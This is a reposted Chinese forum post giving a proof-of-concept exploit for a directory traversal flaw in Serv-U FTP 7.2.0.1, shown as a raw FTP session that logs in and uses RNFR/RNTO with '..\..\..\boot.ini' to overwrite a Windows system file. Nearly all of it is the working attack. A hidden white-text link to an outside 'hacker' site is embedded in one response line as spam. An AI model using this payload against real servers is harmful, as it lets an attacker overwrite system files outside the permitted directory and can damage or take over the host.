【转载】Serv-U 7.2.0.1文件重命名目录遍历漏洞
Serv-U 7.2.0.1文件重命名目录遍历漏洞#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name. [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited
页:
[1]